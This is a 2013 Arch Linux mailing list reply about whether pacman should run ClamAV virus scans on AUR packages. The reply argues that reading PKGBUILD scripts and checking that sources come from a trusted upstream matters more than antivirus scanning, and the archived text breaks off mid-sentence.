[arch-general] Integrating Virus Scanning for Packages Handled by Pacman

Daniel Micay danielmicay at gmail.com
Tue Apr 23 18:56:56 EDT 2013

On Tue, Apr 23, 2013 at 1:10 PM, Mark E. Lee <mark at markelee.com> wrote:
> While building packages on the AUR, I was wondering that except for
> manual user intervention (by reading the code), I didn't have any other
> methods of knowing if a package had malware or viruses. Hence, I was
> wondering if virus scanning via clamav should be called before pacman
> installs packages.
> --
> Mark E. Lee <mark at markelee.com>

The PKGBUILD itself is a bash script. If you're running them without
reading the code and checking that the sources are from an upstream
you trust, you're gonna have a bad time.

There are plenty of packages in the AUR that touch outside of $pkgdir
- but most seem to be beginner mistakes in good faith. ClamAV pretty
much just detects very common win32 viruses, because it's used on mail
servers to *reduce* the number of spread viruses.

If you really feel like scanning the package contents after you've
already trusted the PKGBUILD and build scripts, just don't use makepkg

More information about the arch-general mailing list